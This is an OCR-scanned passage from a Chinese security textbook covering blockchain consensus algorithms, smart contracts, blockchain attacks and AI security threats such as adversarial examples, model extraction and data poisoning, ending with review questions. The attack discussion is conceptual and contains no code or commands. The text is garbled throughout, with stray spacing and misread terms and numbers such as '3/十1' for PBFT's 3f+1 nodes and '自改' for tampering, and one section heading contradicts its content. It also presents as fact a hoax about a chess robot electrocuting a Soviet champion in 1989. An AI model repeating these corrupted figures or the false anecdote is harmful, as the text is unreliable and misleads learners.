制 类 似 于 当今 社会 中 的 股东 机 制 ,产生 区 块 的 难度 与 节点 与 在 网 络 中 占有 的 股份 有 关 , 挖 
矿产 生 区 块 的 难度 与 所 有 者 持 有 的 权益 成 反比 , 即 , 股 权 越 多 得 到 记 账 权 的 概率 就 越 大 。 
相 较 于 POW,POS 机 制 在 一 定 程度 上 减少 了 纯粹 靠 Hash 运算 来 争夺 记 账 权 带 来 的 资源 
损耗 ,缩短 了 全 网 共识 的 时 间 , 安 全 性 与 性 能 均 得 到 了 提升 ,但 仍然 存在 可 监管 性 弱 的 


3. DPOS( 股 份 授权 证 明 ) 

DPOS(Delegated Proof Of Stake) 算 法 是 由 Bitshares 为 防止 大 矿 池 垄 断 全 网 算 力 而 
设计 提出 的 。 为 了 减少 中 心 化 带 来 的 影响 ,该 机 制 首次 提出 了 权益 代表 的 概念 。 网 络 中 
的 所 有 股东 节点 都 有 投票 权 , 通 过 民主 的 方式 选 出 票数 最 多 的 节点 作为 代理 节点 进行 共 
识 、 验 证 与 记 账 。 被 选 出 的 代理 节点 拥有 相同 的 权限 ,每 个 节点 都 会 被 分 配 一 个 时 间 片 来 
生成 区 块 。 若 在 这 段 时 间 内 出 现 网 络 中 断 ,故意 作恶 而 导致 区 块 生 成 失败 或 新 区 块 未 被 
广播 ,将 会 重新 投票 选举 代理 节点 。 该 机 制 的 优点 在 于 可 以 有 效 减 少 参 与 共识 节点 的 数 
量 ,缩短 共识 验证 的 时 间 , 区 块 生成 速度 较 快 。 


4. PBFT( 实 用 拜占庭 容错 ) 

PBFT(Practical Byzantine Fault Tolerance) 由 Castro 与 Liskov 在 论文 Practical 
Byzatine Fault Tolerance 中 首次 提出 。 该 算法 解决 了 拜占庭 容错 (BFT) 算 法 效率 不 高 
的 问题 ,需要 经 过 request、pre-request、prepare、commit 以 及 reply 这 5 个 阶段 才能 完成 。 
其 中 ,prepare 和 commit 阶段 需要 进行 两 两 交互 才能 确保 节点 达成 一 致 。 一 般 来 说 ， 
PBFT 系统 需要 部 署 至 少 3/ 十 1 个 节点 ,最 多 可 以 容忍 f 个 拜占庭 节点 ,才能 保证 整个 
网 络 做 出 正确 的 判断 。PBFT 共识 机 制 允许 监管 节点 参与 ,相对 于 其 他 共识 算法 ,其 耗 能 
相对 较 低 , 且 性 能 相对 较 高 。 该 算法 的 缺点 在 于 其 不 适用 于 大 规模 的 节点 共识 ,这 是 因为 
达成 共识 所 消耗 的 时 间 会 随 着 网 络 节点 数 的 增加 而 逐渐 变 大 。 


6.5.3 智能 合约 


智能 合约 早 在 1995 年 被 Nick Szabo 提出 ,他 将 智能 合约 定义 为 “一 种 无 须 中 介 .部 
署 即 可 自动 执行 与 验证 的 计算 机 协议 。 其 总 体 目标 是 为 了 满足 抵押 、 支 付 、 保 密 等 合约 条 
件 ,最 小 化 意外 或 恶意 情况 的 发 生 并 最 小 化 信任 中 介 的 职能 。 利 用 智能 合约 可 以 降低 仲 
裁 以 及 强制 执行 的 成 本 ,并 降低 违约 带 来 的 损失 等 "。 随 着 区 块 链 的 普及 ,智能 合约 逐渐 
得 到 实际 应 用 。 作 为 一 种 运行 在 链 上 并 可 针对 区 块 链 数据 库 进行 读 写 操 作 的 代码 ,智能 
合约 可 以 自动 执行 参与 方 指定 的 数字 契约 。 通 过 结合 区 块 链 以 及 相关 编程 范式 ,实现 了 
具有 校 验 简单 责任 明确 .逻辑 清晰 特点 的 简单 合约 ,降低 了 指定 与 履行 合约 的 成 本 。 
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能 合约 具有 如 下 优点 : 


中 心 化 。 智 能 合约 被 部 署 在 去 中 心 化 的 区 块 链 上 ,无 须 中 心 化 的 权威 机 构 来 促 
裁 与 监督 合约 是 否 有 效 运行 。 通 常 由 网 络 中 的 节点 共识 选举 出 记 账 节点 来 判断 
合约 是 否 按照 规定 执行 ,实现 了 去 中 心 化 的 权威 。 

较 低 的 人 为 干预 风险 。 在 区 块 链 系 统 中 ,智能 合约 的 内 容 与 执行 过 程 都 是 事先 制 
定好 的 。 智 能 合约 在 基于 沙 箱 技术 的 虚拟 机 中 运行 ,被 完全 封装 隔离 ,无 法 直接 
与 网 络 、 文 件 系统 以 及 其 他 进程 进行 交互 。 区 块 链 中 的 任意 一 方 都 不 能 单方 面 修 
改 其 中 的 内 容 或 者 干预 合约 的 执行 。 这 一 方式 保障 了 智能 合约 的 安全 性 ,实现 了 
合约 高 效 准确 地 运行 ,同时 也 减少 了 人 为 干预 的 风险 。 

可 观察 性 与 可 验证 性 。 区 块 链 通 过 数字 签名 以 及 时 间 戳 保障 智能 合约 的 可 溯源 、 
不 可 自 改 。 合 约 方 可 观察 合约 的 运行 状态 、 执 行 记录 等 ,确保 执行 过 程 具有 可 验 
高 效 性 与 实时 性 。 智 能 合约 能 够 实时 响应 用 户 请 求 ,具有 较 高 的 服务 效率 。 

低 成 本 。 智 能 合约 具有 自我 验证 与 自我 执行 的 特点 , 相 较 于 传统 合约 ,其 成 本 较 
低 , 大 大 减少 了 合约 执行 、 强 制 执 行 裁决 过 程 中 的 损耗 。 


借助 智能 合约 这 一 技术 ,可 以 在 无 须 第 三 方 参与 的 情况 下 保证 系统 的 公平 性 与 正确 
性 ,实现 安全 且 高 效 的 信息 交换 控制 .资产 转移 与 管理 ,为 建设 可 编程 系统 黄 定 了 基础 ,也 
为 改变 现 有 的 传统 的 商业 模式 和 社会 生产 流程 带 来 了 可 能 。 

面向 区 块 链 应 用 的 智能 合约 构建 以 及 执行 的 步骤 如 下 : 


合约 生成 。 各 合约 参与 方 进行 协商 ,明确 权利 与 义务 ,制定 合约 规范 ,确定 标准 智 
能 合约 。 

合约 发 布 。 合 约 通过 广播 的 方式 发 送 至 各 个 节点 ,每 个 节点 都 会 将 合约 保存 在 内 
存 中 。 在 经 过 共识 之 后 ,合约 集合 会 以 区 块 的 形式 扩散 到 全 网 各 个 节点 。 

合约 执行 。 智 能 合约 的 执行 基于 事件 触发 机 制 , 若 符合 触发 条 件 , 智 能 合约 将 会 
自动 执行 。 整 个 合约 的 执行 过 程 都 由 区 块 链 底层 系统 自动 完成 ,该 过 程 对 网 络 中 
的 所 有 参与 方 公 开 可 见 。 


6.5.4 区 块 链 的 主要 类 型 
区 块 链 根据 准 入 机 制 主要 分 为 3 种 类 型 。 


1. 


公有 链 


公有 和 链 完全 去 中 心 化 ,任何 个 体 和 团体 都 可 发 送 交易 ,公有 链 是 最 早 的 区 块 链 ,也 是 
应 用 最 广泛 的 区 块 链 。 典 型 公有 链 包 括 比 特 币 等 各 类 数字 货币 、 以 太 坊 。 以 太 坊 是 以 区 
块 链 技术 十 智能 合约 实现 的 , 它 区 别 于 常见 的 比特 币 , 实 际 上 是 一 个 基于 交易 的 状态 机 ， 
其 区 块 链 中 的 每 个 区 块 就 对 应 一 个 状态 ,每 产生 一 个 区 块 , 以 太 坊 中 的 状态 就 会 转换 到 下 
一 个 状态 。 当 与 以 太 坊 交互 时 ,其 实 就 是 在 执行 交易 改变 系统 状态 。 


2. 联盟 链 
公有 链 是 部 分 中 心 化 ,由 某 个 群体 内 部 指定 多 个 预选 的 节点 为 记 账 人 ,每 个 块 的 生成 
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由 所 有 的 预选 节点 共同 决定 ,其 他 接 入 节点 可 以 参与 交易 ,但 不 过 问 记 账 过 程 。2015 年 ， 
Linux 基金 会 发 起 了 开源 联盟 链 Hyperledger( 超 级 账本 ) 项 目 。 随 后 ,IBM 加 入 并 推出 
Hyperledger Fabric 联盟 链 底 层 开发 平台 ,参与 企业 早已 超过 250 家 ,上 线 数 百 个 应 用 案 
例 , 是 全 球 最 具 竞 争 力 的 联盟 链 开 发 平台 。 


3. 私有 链 

私有 链 仅仅 使 用 区 块 链 的 总 账 技术 进行 记 账 ,可 以 是 一 个 公司 或 个 人 独 享 该 区 块 链 
的 写 人 权限 。 由 于 参与 节点 是 有 限 和 可 控 的 ,因此 私有 链 具备 极 快 的 交易 速度 .更 好 的 隐 
私 保护 .更 低 的 交易 成 本 不 容易 被 恶意 攻击 等 特点 。 相 对 于 中 心 化 的 数据 存储 ,私有 链 
能 够 防止 机 构 内 单个 节点 的 故意 隐瞒 或 者 自 改 数据 ,在 错误 发 生 的 时 候 也 能 快速 溯源 。 

私有 链 的 应 用 场景 一 般 是 政务 和 企业 内 部 的 应 用 ,如 数据 库 管理 审计、 行业 统计 数 
据 、 公 文 流转 和 处 理 等 。 私 有 链 的 价值 主要 是 提供 安全 ,可 追溯 .不 可 自 改 、 自 动 执行 的 运 
算 平台 。 


6.5.5 区 块 链 的 安全 


区 块 链 具有 不 可 算 改 性 。 一 方面 ,区 块 链 中 存储 的 交易 信息 每 一 条 都 有 相对 应 的 
Hash 值 ,由 每 一 条 记录 的 Hash 值 作为 叶子 节点 生成 二 又 Merkle 树 , Merkle 树 的 根 节 
点 (Hash 值 ) 保 存在 本 区 块 的 块头 部 分 ,区 块头 部 除了 当前 区 块 的 Merkle 树 的 根 节点 ， 
还 保存 时 间 戳 以 及 前 一 个 区 块 的 Hash 形成 一 条 链 式 结构 。 因 此 ,要 想 自 改 区 块 链 中 的 
一 条 记录 ,不 仅 要 修改 本 区 块 的 Hash 值 , 还 要 修改 后 续 所 有 区 块 的 Hash 值 ,或 者 生成 一 
条 新 的 区 块 链 结构 ,使 得 新 的 链 比 原来 的 链 更 长 。 实 际 上 ,这 是 很 难 实现 的 。 一 般 一 个 区 
块 后 面 有 6 个 新 的 区 块 生成 时 , 即 可 认为 该 区 块 不 可 自 改 ,可 以 将 该 区 块 加 入 到 区 块 链 的 
结构 中 。 

区 块 链 具有 不 可 伪造 性 和 可 验证 性 。 区 块 链 保 存 的 交易 数据 中 不 仅 含 有 Hash ff. 
还 有 交易 双方 的 签名 以 及 验证 方 的 签名 ,保证 了 交易 的 不 可 伪造 性 。 每 一 笔 交易 中 数字 
货币 的 产生 和 输入 ,输出 都 是 可 以 验证 的 ,区 块 链 结构 中 不 会 凭空 增加 电子 货币 。 以 比特 
币 为 例 ,每 一 笔 交易 的 输入 都 是 前 一 笔 交易 的 输出 ,每 一 笔 交 易 的 输出 又 是 下 一 笔 交易 的 
输入 ,保证 交易 的 可 追溯 性 。 除 了 来 源 的 可 验证 外 ,还 会 验证 金额 的 正确 性 ,确保 交易 过 
程 中 的 每 一 笔 资金 都 是 可 靠 的 。 

然而 在 实际 系统 的 运行 当中 ,区 块 链 仍 然 面临 以 下 的 安全 问题 。 


1. 51% 算 力 攻击 

51% 攻 击 ( 也 被 称 为 多 数 攻击 ) 是 当 攻 击 者 掌握 了 超过 全 网 50% 的 算 力 ,就 很 容易 阻 
止 其 他 “矿工 ”确认 交易 ,从 而 阻止 新 的 交易 ,也 可 以 逆转 当前 区 块 已 经 完成 的 交易 ,并 在 
网 络 中 双 花 电子 货币 。2018 年 , 几 个 著名 的 密码 货币 Zencash, Verge, Ethereum Classic 
就 受到 了 51763 d: , 据 统计 ,攻击 者 2018 年 一 年 窃取 了 超过 2000 万 美元 。 


2. 攻击 交易 所 
加 密 货币 交易 所 因为 拥有 大 量 的 加 密 货币 ,而 有 时 安全 防范 措施 不 到 位 ,成 为 黑客 们 
关注 的 目标 。 许 多 交易 所 平台 是 中 心 化 的 ,反而 形 失 了 区 块 链 非 中 心 化 的 内 在 优势 。 
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$63 应 用 安全 基础 


2014 年 2 月 ,当时 处 理 70%% 比 特 币 交易 的 领先 交易 所 Mt.Cox 报告 被 黑客 窃取 了 大 约 85 
万 个 比特 币 。 当 前 对 交易 所 的 攻击 仍然 频 发 ,2018 年 交易 所 丢失 了 约 价值 9 亿美 元 的 数 
字 货 币 。 

由 于 加 密 数 字 货 币 以 钱包 的 公 钥 作为 账户 地 址 ,具有 一 定 的 匿名 性 ,但 是 私 钥 对 钱包 
的 安全 性 至 关 重 要 。 要 牢记 “ 私 钥 丢 了 , 钱 就 丢 了 ”。 因 此 最 安全 的 办 法 是 将 私 钥 存 在 硬 
件 中 或 者 写 在 纸 上 受 善 保管 ,不 要 存在 联网 的 在 线 钱 包 中 。 

3. 软件 漏洞 

如 比特 币 和 以 太 坊 等 有 名 的 区 块 链 已 经 证 明 它们 面 对 众 多 种 类 攻击 的 健壮 性 ,但 在 
其 上 开发 的 许多 APP 仍然 可 能 存在 很 多 Bug. 2018 年 ,钱包 和 去 中 心 化 APP. 的 软件 
bug 导致 了 超过 2400 万 美元 的 损失 。 因 此 针对 这 些 软 件 需 要 进行 完备 的 代码 审计 渗透 
测试 和 智能 合约 监控 。 


4. 隐私 泄露 

如 果 区 块 链 是 公有 链 ,区 块 链 上 每 一 笔 交易 对 区 块 链 的 任何 用 户 都 是 可 见 的 ,由 于 区 
块 链 并 不 直接 显示 账户 持 有 者 的 身份 ,但 是 区 块 链 的 大 量 数据 可 以 公开 获取 ,其 中 可 能 包 
括 财务 .金融 乃至 医疗 信息 ,通过 大 数据 关联 分 析 ,很 可 能 形成 对 特定 用 户 的 去 标识 化 ,从 
而 泄露 用 户 的 隐私 信息 。 


”66 ”人工 智 能 及 其 安全 


6.6.1 ”人工 智能 的 主要 技术 领域 


人 工 智 能 作为 计算 机 科学 的 一 个 分 支 ,主要 研究 如 何 让 机 器 能 像 人 类 一 样 去 思考 行 
动 ,探索 智能 的 本 质 ,并 创造 出 一 种 能 模拟 人 类 思维 过 程 、 产 生 媲美 人 类 智能 反应 的 系统 ， 
最 终 目标 让 其 服务 于 人 类 ,将 人 类 从 劳动 中 解放 出 来 。 

目前 人 工 智能 涉及 的 范围 极 广 , 其 应 用 与 研究 领域 主要 包括 : 问题 求解 与 博弈 .逻辑 
推理 与 定理 证 明 、 计 算 智能 (涉及 神经 计算 ,模糊 计算 、 进 化 计算 、 自 然 计 算 、 免 疫 计算 等 方 
向 )、 分 布 式 人 工 智能 与 代理 、 自 动 程序 设计 、 专 家 系统 、 机 器 学 习 、 自 然 语言 理解 .机 器 人 
学 模式 识别 .机 器 视觉 .神经 网 络 .智能 控制 .智能 调度 与 指挥 .智能 检索 .系统 与 语言 工 
具 等 。 

从 技术 层面 ,人 工 智 能 可 主要 划分 为 以 下 领域 : 自然 语言 处 理 `. 计 算 机 视觉 .深度 学 
习 , 语 音 识别 .智能 机 器 人 、 数 据 挖掘 等 。 人 工 智能 技术 的 发 展 使 其 在 多 个 方面 取得 了 很 
多 优秀 的 成 果 和 应 用 ,代替 了 很 多 需要 人 类 智能 才能 完成 的 复杂 工作 ,正在 一 步 步 改变 着 
我 们 的 日 常生 活 。 本 小 节 对 人 工 智 能 常见 的 几 种 应 用 进行 简单 介绍 。 

1. 自然 语言 处 理 

自然 语言 处 理 是 将 人 工 智 能 技术 应 用 到 语言 研究 领域 ,通过 计算 机 对 自然 语言 的 分 
Tr ,对 词法、 句法 .语法 和 语义 进行 理解 分 析 , 实 现 人 机 信息 交流 。 常 见 的 应 用 包括 机 器 翻 
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译 、 文 本 处 理 、 语 音 识别 等 。 


2. 计算 机 视觉 

计算 机 视觉 是 利用 计算 机 及 相关 设备 对 生物 视觉 进行 模拟 的 过 程 ,通过 对 图 片 或 者 
视频 进行 处 理 , 让 计算 机 具备 理解 图 像 表 示 内 容 、 图 像 中 物体 存在 的 关系 等 能 力 。 常 见 的 
应 用 包括 文字 识别 .图像 处 理 、 图 像 识 别 等 。 

3. 深度 学 习 

深度 学 习 是 目前 人 工 智能 领域 研究 的 热点 , 它 起源 于 机 器 学 习 中 的 模型 ,通过 建立 模 
拟人 脑 进 行 分 析 学 习 的 神经 网 络 ,模仿 人 脑 机 制 来 对 数据 进行 解释 。 与 传统 的 机 器 学 习 
相 比 ,深度 学 习 特 征 提取 不 依赖 于 人 工 , 可 以 实现 机 器 自动 提取 。 常 见 的 深度 学 习 模 型 有 
卷 积 神经 网 络 (CNN) ,循环 神经 网 络 (RNN) ,对抗 生成 网 络 (GAN) 和 强化 学 习 (RL) 等 。 


4. 数据 挖掘 

随 着 互联 网 . 物 联网 等 网 络 技术 的 发 展 ,产生 了 大 量 数据 ,如 何 有 效 地 对 数据 进行 利 
用 ,从 中 提取 出 具有 潜在 价值 的 信息 和 知识 就 是 数据 挖掘 技术 研究 的 重点 。 例 如 ,在 商业 
领域 ,数据 挖掘 可 帮助 企业 对 目标 用 户 进 行 精准 画像 ,推荐 相关 产品 或 者 划分 为 同类 型 
用 户 。 


6.6.2 人工 智能 自身 的 安全 问题 


人 工 智能 受到 了 学 术 界 和 工业 界 大 量 的 关注 和 深入 的 研究 ,而 机 器 学 习作 为 人 工 智 
能 的 核心 ,近年 来 也 得 到 了 长 足 的 发 展 , 其 应 用 遍布 人 工 智 能 的 各 个 领域 。 目 前 ,机 器 学 
习 的 各 种 算法 和 模型 发 展 层出不穷 ,在 不 同 的 应 用 场景 中 ,各 种 算法 都 有 其 特有 的 优势 和 
应 用 价值 。 然 而 大 多 数 机 器 学 习 模 型 都 是 针对 一 个 非常 弱 或 者 没有 的 威胁 模型 进行 设 
计 , 强 调 性 能 的 同时 很 少 考虑 到 自身 存在 的 安全 问题 ,对 于 攻击 者 的 攻击 能 力 和 攻击 目标 
的 假设 严重 缺乏 ,因此 机 器 学 习 模 型 在 学 习 ( 训 练 ) 阶 段 和 推理 (预测 ) 阶 段 都 容易 受到 不 
同 程度 的 恶意 修改 或 攻击 ,导致 模型 参数 被 窃取 、 模 型 可 用 性 和 完整 性 被 破坏 等 问题 的 发 
生 。 目 前 常见 的 人 工 智能 自身 安全 问题 如 下 所 述 。 


1. 对 抗 样本 

由 于 机 器 学 习 模 型 输入 输出 均 为 数值 型 向 量 的 格式 ,因此 攻击 者 可 以 在 模型 预测 过 
程 中 ,对 待 预 测 样本 添加 特定 很 小 的 扰动 或 者 进行 细微 的 修改 ,使 用 者 很 难 感知 到 , 却 足 
以 使 得 模型 对 于 该 样本 判断 出 错 ,这 种 攻击 行为 被 称 为 对 抗 性 攻击 ,所 修改 使 用 的 样本 就 
是 对 抗 样本 。 图 6-32 是 一 个 对 抗 性 样本 的 例子 ,原本 是 一 张 “熊猫 ”的 图 添加 少量 噪声 后 
就 会 被 识别 为 长 臂 猿 , 且 可 信 度 为 99.3%。 

在 无 人 驾驶 领域 ,攻击 者 通过 构造 对 于 决策 系统 具有 欺骗 性 的 路 标 或 障碍 物 ,干扰 自 
动 驾 驶 系统 的 决策 ,人 迫使 车 辆 进入 异常 驾驶 状态 ,危害 巨大 。 图 6-33 即 为 一 个 被 恶意 修 
改过 的 STOP 路 牌 ,自动 驾驶 车 辆 会 将 其 识别 为 “ 限 速 45km/h”。 


2. 模型 萃取 
攻击 者 采用 试探 性 攻击 ,通过 构造 请 求 向 目标 服务 发 起 查询 ,取得 目标 模型 参数 或 者 
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图 6-32 对抗 性 样本 举例 


构造 出 与 目标 模型 功能 相似 可 替代 的 模型 。 对 于 一 个 
有 具有 nn 维 参数 的 模型 ,理论 上 只 需要 进行 n 十 1 次 查 
询 ,就 可 以 通过 解 方程 的 方式 求解 出 目标 模型 参数 ,或 
者 通过 查询 结果 构造 出 与 目标 模型 类 似 的 方程 组 , 求 
得 功能 可 替代 的 “影子 模型 "。 


3. 投 毒 攻击 

在 模型 训练 过 程 中 修改 训练 数据 集 或 者 投放 精心 
构造 的 恶意 样 例 ,从 而 使 训练 数据 中 毒 或 者 被 污染 , 干 
扰 机 器 学 习 模型 的 训练 过 程 ,降低 最 终 得 到 模型 的 判 uo 
断 准 确 性 。 例 如 ,2017 年 下 半年 ,一 些 高 级 的 垃圾 邮 图 6-33 ”被 恶意 构造 的 路 标 
件 发 送 群 组 通过 将 一 些 垃 圾 邮件 反馈 报告 为 非 垃圾 邮 
件 ,改变 了 分 类 器 的 判断 边界 ,让 Gmail 垃圾 邮件 过 滤器 不 再 记录 该 垃圾 邮件 。 


4. 训练 数据 窃取 

人 工 智能 领域 中 ,数据 是 算法 进行 学 习 训练 的 基础 ,不 少数 据 较为 敏感 或 不 适合 公 
开 , 因 此 存在 针对 模型 训练 集 的 攻击 ,获得 训练 数据 集 的 具体 样本 及 统计 分 布 .或 者 判断 
某 条 数据 是 否 在 该 训练 数据 集中 。 例 如 在 医疗 领域 .攻击 者 可 以 对 以 病 患 信息 训练 而 成 
的 系统 API 实行 “成 员 推断 攻击 ”, 结 合 一 些 数据 记录 信息 和 背景 知识 就 可 以 推断 出 训练 
数据 集中 是 否 包含 有 某 一 病 患 ,严重 威胁 个 人 隐私 安全 。 


6.6.3 人 工 智 能 对 网 络 空间 安全 的 影响 


对 于 网 络 安全 来 讲 , 人 工 智 能 是 一 把 * 双 刃 剑 ”。 一 方面 ,人 工 智能 可 以 将 安全 研究 人 
员 从 海量 的 威胁 数据 分 析 中 解放 出 来 ,通过 监测 威胁 可 以 迅速 发 现 , 分 析 和 响应 新 攻击 和 
新 漏洞 ,自动 化 实时 共享 威胁 情报 ,实现 系统 自动 防御 修复 ,从 而 大 大 提升 抵御 安全 威胁 
的 能 力 , 目 前 ,全 球 越 来 越 多 的 安全 公司 正在 尝试 将 人 工 智 能 .机 器 学 习 等 集成 到 产品 之 
中 ,智能 化 (Intelligence) .自动 化 (Automatic) 成 为 2018 年 美国 RSA 大 会 上 的 热 词 ;但 另 
一 方面 ,人 工 智能 也 带 来 了 新 的 网 络 安全 威胁 。 
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1. 人 工 智能 技术 及 其 应 用 的 复杂 性 带 来 的 安全 挑战 

人 工 智能 不 仅仅 是 各 种 算法 和 方案 的 集合 ,更 是 一 个 由 软件 .硬件 .数据 设备 ,通信 
协议 .数据 接口 和 人 组 成 的 丰富 多 彩 的 生态 系统 ,未 来 会 广泛 应 用 于 自动 驾驶 、 工 业 机 器 
人 ,智能 医疗 ,无 人 机 、 智 能 家 居 助 手 等 领域 ,这 种 复杂 的 技术 构成 和 应 用 场景 势必 会 产生 
新 的 安全 漏洞 。 在 软件 及 硬件 层面 ,包括 应 用 、 模 型 .平台 和 芯片 ,编码 都 可 能 存在 漏洞 或 
后 门 ; 在 模型 层面 上 ,攻击 者 同样 可 能 在 模型 中 植 人 后 门 并 实施 高 级 攻击 。 而 目前 大 多 数 
人 工 智 能 系统 严重 欠缺 可 解释 性 ,其 决策 过 程 、. 判 断 罗 辑 、. 判 断 依据 等 都 很 难 被 人 所 理解 ， 
由 于 模型 的 不 可 解释 性 ,在 模型 中 植 和 的 恶意 后 门 难以 被 检测 ,例如 ,2017 年 12 月 ,谷歌 
被 爆 出 其 机 器 学 习 框 架 TensorFlow 中 存在 严重 的 安全 漏洞 。 


2. 利用 人 工 智能 的 网 络 犯罪 

目前 , 绝 大 多 数 行业 都 开始 尝试 利用 人 工 智 能 技术 来 完成 自动 化 的 转变 ,提升 各 方面 
性 能 ,网 络 犯罪 也 不 例外 ,黑客 同样 也 会 利用 人 工 智能 让 攻击 变 得 更 高 效 。 这 主要 是 因为 
人 工 智能 系统 具有 成 本 低 、 易 于 实施 和 扩展 性 强 等 特点 ,可 使 犯罪 分 子 以 各 种 方式 规避 监 
管 检测 .通过 网 络 安全 内 容 过 滤 等 。 例 如 ,2017 4E 9 月 ,绍兴 警方 成 功 破获 我 国 首 例 利用 
人 工 智 能 技术 侵犯 公民 个 人 信息 案 ,在 该 案 中 ,犯罪 分 子 利 用 一 种 具有 深度 学 习 功能 的 
“ 快 啊 ” 打 码 平 台 进 行 机 器 快速 识别 验证 码 , 从 而 绕 过 网 络 账户 安全 登录 策略 。 

社会 工程 攻击 是 最 为 普遍 的 一 种 网 络 犯罪 技术 ,但 是 传统 地 实施 攻击 所 需 成 本 较 高 ， 
利用 人 工 智能 就 可 以 实现 自动 化 、 匿 名 化 地 进行 攻击 。 例 如 ,2019 年 3 月 ,一 名 拉丁 美洲 
的 犯罪 嫌疑 人 利用 人 工 智能 模拟 口音 ,成 功 让 一 家 英国 能 源 公司 的 高 管 相信 自己 正在 与 
德国 母 公司 的 老板 通话 并 批准 了 一 笔 22 万 欧元 的 紧急 汇款 ,这 也 是 世界 上 首次 公开 报道 
的 人 工 智能 诈骗 案 。 因 此 可 以 预见 ,未 来 利用 人 工 智能 的 犯罪 形式 会 层出不穷 ,而 基于 人 
工 智能 的 科学 技术 不 断 进 步 ,使 用 人 工 智 能 进行 网 络 攻击 也 将 成 为 愈 发 普遍 却 也 更 加 危 
险 的 趋势 。 


3. 人 工 智 能 的 不 确定 性 引发 的 安全 风险 

人 工 智 能 自身 存在 “算法 黑箱 ”, 某 些 自动 化 决策 和 行为 有 一 定 的 不 可 解释 性 , 解 
释 不 了 如 此 决策 和 行为 的 原因 和 逻辑 ,如 何 使 得 这 种 自动 化 决策 的 不 确定 性 可 控 成 为 
重大 的 安全 挑战 。 人 工 智能 技术 的 理论 基础 很 大 部 分 建立 在 概率 论 和 数理 统计 的 基 
础 上 。 因 此 ,人 工 智能 并 不 是 简单 的 一 对 一 的 映照 和 因果 关系 ,而 是 由 机 器 主导 的 一 
种 大 概率 性 正确 选择 和 判断 。 尽 管 从 理论 而 言 , 人 工 智 能 运行 中 的 风险 事件 的 发 生 概 
率 很 低 , 但 是 现 有 技术 无 法 预 估 其 带 来 的 损失 边界 和 安全 边界 ,其 何 时 发 生 、 在 哪个 节 
点 发 生 以 及 为 何 发 生 更 是 难以 预测 。 所 以 , 同 传统 的 计算 机 程序 相 比 ,人 工 智 能 程序 
的 内 在 风险 更 高 。 

在 人 工 智能 的 发 展 历史 上 ,人 工 智能 机 器 人 伤害 人 的 事件 也 已 见 诸 报道 。 早 在 1989 
年 ,苏联 国际 象棋 冠军 古 德 柯 夫 在 与 机 器 人 对 弈 中 连 胜 三 局 ,机 器 人 突然 向 金属 棋盘 释放 
出 强 电流 , 造 成 古 德 柯 夫 丧生 。2017 年 ,Facebook 的 两 个 对 话机 器 人 更 是 在 对 话 的 过 程 
中 生成 了 人 类 看 不 懂 的 语言 ,官方 为 并 慎 起 见 只 能 将 其 关 停 。 伴 随 着 人 工 智 能 技术 的 大 
规模 落地 和 深入 使 用 ,网 络 空 间 中 的 许多 节点 和 应 用 都 将 交 给 人 工 智 能 处 理 ,在 这 样 的 大 
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背景 下 ,如 何 降低 和 规避 人 工 智能 技术 的 技术 风险 ,以 及 降低 风险 事件 对 网 络 空间 和 现实 
社会 的 影响 是 需要 重视 的 问题 。 


4. 人 工 智 能 对 隐私 保护 造成 的 安全 挑战 

人 工 智 能 的 莲 勃 发 展 建立 在 大 数据 ` 云 计算 等 平台 上 ,只 有 依靠 硬件 平台 不 断 地 收 
集 , 整 理 用 户 的 特征 数据 和 行为 数据 ,人 工 智 能 的 算法 才能 够 持续 成 长 和 应 用 。 因 此 ,人 敏 
感 数据 的 泄露 风险 将 会 不 断 增加 。 如 果 触 发 人 工 智 能 自身 的 缺陷 或 者 被 黑客 攻击 ,大 量 
敏感 的 信息 将 会 面临 泄露 风险 , 轻 则 用 户 个 人 信息 被 不 法 分 子 掌握 , 重 则 危害 用 户 财 产 安 
全 甚至 人 身 安 全 。 同 时 ,人 工 智 能 技术 能 够 便捷 地 在 网 络 空间 收集 和 识别 个 人 隐私 ,如 文 
字 、 头 像 等 信息 ,并 根据 这 些 信 息 精 确 刻画 个 人 相关 的 性 格 ,社会 关系 、 收 入 和 消费 偏好 等 
属性 , 稍 不 注意 ,一 个 人 的 方方面面 就 会 被 人 工 智能 技术 全 面 感知 ,并 暴露 在 社会 之 中 。 
所 以 ,在 人 工 智能 技术 发 展 和 应 用 的 同时 ,需要 从 技术 、 政 策 、 法 律 和 标准 等 方面 保证 个 人 
隐私 的 安全 。 


5. 基于 人 工 智能 的 网 络 攻防 愈加 激烈 

当今 ,工程 界 和 学 术 界 普遍 认为 人 工 智 能 同 攻防 的 结合 是 网 络 安全 发 展 的 必然 趋势 ， 
具有 极 大 成 长 的 空间 。 在 传统 的 网 络 攻防 中 ,网 络 安全 人 员 与 黑客 之 间 的 攻防 较量 极 大 
地 依赖 于 人 员 的 先 验 经 验 积累 ,在 一 定 程度 上 属于 研发 中 的 劳动 密集 型 工作 。 人 工 智能 
技术 的 出 现 和 发 展 可 以 在 一 定 程度 将 劳动 密集 型 的 工作 高 度 自动 化 ,一 方面 ,网 络 攻击 方 
可 以 将 网 络 攻 击 中 的 漏洞 挖掘 .注入 、 攻 击 等 的 行为 自动 化 ,提高 攻击 的 效率 。 另 外 一 方 
面 ,一 些 安 全 厂商 已 经 通过 将 人 工 智 能 技术 和 安全 防御 策略 相 结合 ,构造 出 了 拥有 自主 学 
习 能 力 的 主动 防御 系统 ,该 防御 系统 除了 能 够 应 对 传统 的 网 络 威胁 ,也 可 以 预防 潜在 的 各 
类 后 门 攻 击 , 面 对 各 类 越 来 越 复 杂 和 智能 化 的 渗透 式 网 络 人 侵 也 有 一 战 之 力 。2013 年 开 
始 , 美 国 DARPA 发 起 了 全 球 性 网 络 安全 挑战 赛 CGC(Cyber Grand Challenge) , 旨 在 推 
进 自动 化 网 络 防 御 技 术 发 展 ,能 够 实时 识别 系统 缺陷 、 漏 洞 ,并 自动 完成 打 补丁 和 系统 防 
御 , 最 终 实现 全 自动 的 网 络 安 全 攻防 系统 。 参 赛 队 伍 全 部 由 计算 机 组 成 ,没有 人 类 干预 。 
在 2016 年 8 月 5 一 7 日 美国 拉 斯 维 加 斯 举办 的 网 络 安 全 顶级 赛事 Defcon CTF 中 ， 
Mayhem 的 机 器 人 CTF 战队 与 另外 14 支 人 类 CTF 顶级 战队 同 台 竞技 ,并 一 度 超过 两 只 
人 类 战队 ,成 为 自动 攻防 的 标志 性 事件 。 
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1. 挑战 应 答 认 证 协议 为 什么 可 以 对 抗 重 放 攻击 ? 

2. Web 登录 认证 中 经 常会 碰 到 输入 验证 码 , 它 起 什么 作用 ? 你 能 否 设计 一 种 新 的 验 
证 码 方 式 ? 

3. 简 述 数字 证 书 有 效 性 验证 的 步骤 。 

